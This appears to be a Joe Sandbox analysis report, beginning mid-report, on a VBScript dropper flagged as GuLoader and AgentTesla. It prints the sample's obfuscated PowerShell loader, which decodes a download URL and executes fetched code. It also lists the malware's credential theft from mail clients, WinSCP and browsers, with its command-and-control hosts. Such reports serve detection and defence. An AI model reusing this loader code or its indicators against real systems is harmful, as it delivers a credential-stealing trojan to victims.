') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000009.00000002.2774546567.00000000204E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000009.00000002.2774546567.00000000204E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000009.00000002.2774546567.00000000204E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts221
            Windows Management Instrumentation            		Path Interception211
            Process Injection            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts221
            Scripting            		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts221
            Scripting            		1
            Credentials in Registry            		24
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts11
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)2
            Obfuscated Files or Information            		Security Account Manager221
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration1
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts2
            PowerShell            		Logon Script (Mac)Logon Script (Mac)1
            Software Packing            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets141
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size Limits23
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common141
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items211
            Process Injection            		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1332433 Sample: Tagdk.vbs Startdate: 26/10/2023 Architecture: WINDOWS Score: 100 24 mail.rubasa.com.ec 2->24 26 googlehosted.l.googleusercontent.com 2->26 28 2 other IPs or domains 2->28 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 Yara detected GuLoader 2->40 42 Yara detected AgentTesla 2->42 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 52 VBScript performs obfuscated calls to suspicious functions 9->52 54 Suspicious powershell command line found 9->54 56 Wscript starts Powershell (via cmd or directly) 9->56 58 3 other signatures 9->58 12 powershell.exe 16 9->12         started        process6 signatures7 60 Suspicious powershell command line found 12->60 62 Very long command line found 12->62 15 powershell.exe 21 12->15         started        18 conhost.exe 12->18         started        process8 signatures9 64 Writes to foreign memory regions 15->64 66 Maps a DLL or memory area into another process 15->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 15->68 20 CasPol.exe 10 15->20         started        process10 dnsIp11 30 mail.rubasa.com.ec 142.44.240.172, 49725, 587 OVHFR Canada 20->30 32 drive.google.com 142.251.167.100, 443, 49709, 49711 GOOGLEUS United States 20->32 34 googlehosted.l.googleusercontent.com 172.253.115.132, 443, 49724 GOOGLEUS United States 20->34 44 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->44 46 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->46 48 Tries to steal Mail credentials (via file / registry access) 20->48 50 Tries to harvest and steal browser information (history, passwords, etc) 20->50 signatures12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Tagdk.vbs5%ReversingLabsWin32.Trojan.Generic
            Tagdk.vbs5%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://go.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://www.microsoft.co0%Avira URL Cloudsafe
            http://www.microsoft.co1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.251.167.100
            		truefalse
              		high
              googlehosted.l.googleusercontent.com
              		172.253.115.132
              		truefalse
                		high
                mail.rubasa.com.ec
                		142.44.240.172
                		truefalse
                  		unknown
                  doc-04-8c-docs.googleusercontent.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-04-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ki4j11guteiebf6blo04mvkvk2tr7322/1698303750000/11453474870507226654/*/1ctnmuSYjUQKRXgVd6uPH5tTB4-sb1zXR?e=download&uuid=6a8fff3a-2af7-46da-ad3f-190aba55b412false
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2133508862.0000019B901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2042681481.0000019B81BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2133508862.0000019B9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1941873102.0000000004D17000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1941873102.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1941873102.0000000004D17000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000002.00000002.2042681481.0000019B812CA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2133508862.0000019B901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2042681481.0000019B81BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2133508862.0000019B9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.microsoft.copowershell.exe, 00000002.00000002.2150800220.0000019BE9E89000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2042681481.0000019B80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2042681481.0000019B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1941873102.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1941873102.0000000004D17000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.251.167.100
                                    		drive.google.comUnited States
                                    		15169GOOGLEUSfalse
                                    172.253.115.132
                                    		googlehosted.l.googleusercontent.comUnited States
                                    		15169GOOGLEUSfalse
                                    142.44.240.172
                                    		mail.rubasa.com.ecCanada
                                    		16276OVHFRfalse

                                    General Information

                                    Joe Sandbox Version:38.0.0 Ammolite
                                    Analysis ID:1332433
                                    Start date and time:2023-10-26 09:01:17 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 11s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:13
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample file name:Tagdk.vbs
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winVBS@8/6@4/3
                                    EGA Information:
                                    • Successful, ratio: 33.3%
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 96
                                    • Number of non-executed functions: 18
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, doc-0o-8c-docs.googleusercontent.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 604 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 6876 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:02:34API Interceptor136x Sleep call for process: powershell.exe modified
                                    09:03:21API Interceptor118x Sleep call for process: CasPol.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    OVHFRhttp://jessicadire.comGet hashmaliciousUnknownBrowse
                                    • 198.27.80.129
                                    scorp.arm7.elfGet hashmaliciousMiraiBrowse
                                    • 54.37.53.144
                                    JKTX1269_8406031.jsGet hashmaliciousUnknownBrowse
                                    • 51.91.79.17
                                    INQUIRY_NO._217166.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                    • 142.44.226.116
                                    TT-Copy_Rebound_Electronics_International_Services_DMCC.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 144.217.159.195
                                    WindowsDriverSetup.exeGet hashmaliciousUnknownBrowse
                                    • 51.38.43.18
                                    WindowsDriverSetup.exeGet hashmaliciousUnknownBrowse
                                    • 51.38.43.18
                                    Set-up.exeGet hashmaliciousRedLineBrowse
                                    • 54.39.83.190
                                    file.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, XmrigBrowse
                                    • 91.121.171.208
                                    https://1ckkz.trk.elasticemail.com/tracking/click?d=eAaG_o9dO9qe1DS1Fv_6eYGlT3LPrtfRfdkUgzuXPqdXhIDzJ0NNM8bzAzt-qL30yIlC9Xn3H4mvjlwkIHZteVLA3ArkSo9hfFglOChk3bJ1NhLcsXHxZv0bxBQULBnZj3T2jQ2oiQsphKkwqz3vBTw1Get hashmaliciousPhisherBrowse
                                    • 164.132.95.126
                                    rYAJAFi7do.elfGet hashmaliciousMiraiBrowse
                                    • 192.99.178.29
                                    obizx.exeGet hashmaliciousFormBookBrowse
                                    • 91.121.217.27
                                    IMG-2023010_WAAa646737kendelsesordniGenicular.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 54.37.178.173
                                    file.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, XmrigBrowse
                                    • 188.165.195.130
                                    Ordini_SRLPhantas35t6343573423646000000345235623.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    • 54.37.178.173
                                    cerber.exeGet hashmaliciousCerber, CryptOneBrowse
                                    • 178.33.161.130
